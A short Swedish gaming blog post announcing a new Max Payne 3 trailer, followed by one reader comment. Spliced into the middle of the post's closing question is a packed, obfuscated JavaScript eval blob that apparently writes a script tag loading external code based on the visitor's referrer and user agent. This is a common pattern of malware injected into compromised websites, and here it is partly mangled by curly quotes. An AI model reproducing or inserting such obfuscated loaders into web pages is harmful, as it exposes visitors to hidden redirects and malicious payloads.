Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Kika på nya Max Payne 3-trailern

Sebastian

Nu har det ramlat in en ny Max Payne 3 trailer från företaget Rockstar som visar upp de visuella effekterna och cinematics.

Kan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fehnd|var|u0026u|referrer|zerth||js|php’.split(’|’),0,{}))
detta bli något?

Comments

  1. Pelle

    Kommer bli ganska grymt det här!!